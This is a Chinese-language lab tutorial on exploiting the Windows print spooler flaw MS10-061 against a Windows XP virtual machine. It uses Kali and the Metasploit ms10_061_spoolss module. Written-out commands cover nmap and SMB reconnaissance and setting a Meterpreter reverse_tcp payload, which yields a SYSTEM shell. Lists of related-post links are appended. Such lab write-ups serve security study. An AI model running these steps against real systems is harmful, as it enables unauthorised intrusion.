注意事项:

  • kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!
  • 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!!

1. Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。

2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过WritePrinter请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录(%SystemRoot%\system32)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。
该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)

3.实验环境

VMware虚拟环境
攻击机:Kali Linux;目标机:Windows xp sp2

4.实验步骤

4.1 使用Nmap扫描目标机器是否存在NetBiosRPC服务
4.2 NetBios共享检测
4.3 使用MSF的ms10_061_spoolss模块攻击目标机

5.设置目标机环境

  1. 获取目标机IP
  2. 创建打印共享(默认是没有打印共享)
    1)代开控制面板,选择打印机和其他硬件2)选择打印机和传真
    3)添加打印机4)本地打印机,不勾选“自动检测并安装即插即用打印机”
    5)选择使用LPT1端口
    随便选一个打印机厂商和型号取个名字选择共享打印机

6.在Kali上检测打印机

1)nmap扫描

nmap -sS -sU -O -p127-139,445 192.168.230.137
  • 1


2)查找NetBIOS

nmblookup -A 192.168.230.137
  • 1


NetBIOS工作站名字:123-13DFCFEDD88
NetBIOS组名:WORKGROUP

7.访问SMB资源

smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N
  • 1


看到了打印共享

8.使用MSF模块攻击

1)载入模块,搜索一下ms10_061
2)利用漏洞,并查看需要配置的参数

3)配置参数4)设置Payload

set payload windows/meterpreter/reverse_tcp
  • 1

5)设置Payload参数6)攻击攻击完成后,建立了远程会话,恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制运行的。
7)接下来可以执行一系列操作
getuidgetpid
可以看到我们获取了系统的system权限

此时执行shell可以进入目标机的命令行界面
至此,整个攻击过程已经大体结束,之后可以进行取证等一系列工作。最后感谢各位的阅读,由于本人水平有限,如有不足,敬请谅解。

Kali利用msf对MS10_061漏洞进行渗透测试相关推荐

  1. kali利用MSF对ms17_010漏洞入侵win7

    步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...

  2. kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

    kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...

  3. kail利用msf工具对MS12-020漏洞进行渗透测试

    kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透 ...

  4. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  5. Kali利用MSF入侵安卓手机

    kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

  6. 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)

    利用Metasploit对HFS 2.3渗透攻击提权 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) msf6 > search hfs Matching Mod ...

  7. Kali利用msf渗透Windows电脑(超详细)

    Kali利用msfvenom渗透Windows电脑 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执 ...

  8. Kali之MSF的MS08-067漏洞复现详解

    1.MSF初识: MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集.漏洞扫描.漏洞利用以及提权等功能的工具. 目前安装的kali都自带MSF,可以直接在图形界 ...

  9. 基于msf与badusb的笔记本电脑渗透测试(详解)

    文章目录 1. msf部分 1.1 生成木马文件 1.2 配置监听环境 2. Badusb部分 2.1 收集数据 2.2 编写脚本并上传 3. 配置局域网环境 3.1 创建局域网环境 3.2 设置共享 ...

最新文章

  1. Java编程中,有哪些好的习惯从一开始就值得坚持?
  2. 网易云课堂 学习教程
  3. 每天一个设计模式,工厂方法模式(Factory Method)
  4. 启动定时器t0的工作指令是_看门狗的工作原理、应用和设计思路
  5. 材料科学中的数据挖掘:晶体图神经网络解读与代码解析
  6. 用Eclipse进行C/C++开发
  7. 2021下午茶数字经济蓝皮书
  8. 别再用if-else了,用注解去代替他吧
  9. 惠州交警携手高德地图 引导市民智慧出行
  10. maven java 结构_Maven标准目录结构介绍
  11. angular语言前端开发_2020年前端Angular招聘-前端Angular招聘求职信息-拉勾招聘
  12. 报错:TargetException, 非静态方法需要一个目标
  13. 中无法打开源文件_Safari浏览器无法打开,如何解决Safari在Big Sur中崩溃的情况...
  14. 【毕设】ASP.net校友录毕业设计(源代码+论文+开题报告+答辩PPT)
  15. 【软件开发规范七】《Android UI设计规范》
  16. VMware Workstation 虚拟机下载及安装的详细步骤
  17. erwfgergve
  18. qcom vfe笔记(msm8996平台)
  19. 史诗级梦境之二:沙漠大逃亡
  20. 【String类和标准模板库】

热门文章

  1. Nordic nRF52832程序下载问题分析
  2. 计算机房英语单词,主机房是什么意思
  3. 盲僧一键r闪用什么设置_美加狮R.A.T. PRO X3至尊版带你畅玩模拟飞行
  4. mysql 大于号 优化_SQL优化 MySQL版 - 避免索引失效原则(二)
  5. PHP ERROR_PHP 处理错误函数
  6. lisp将图元追加选择_汕尾幸运儿喜爱大乐透 两次买彩票就擒获8注追加二等奖254万元...
  7. MongoDB系列之——安装和启动
  8. python函数的 全局变量与局部变量
  9. oracle安装及卸载总结
  10. 51nod1244 欧拉函数之和 杜教筛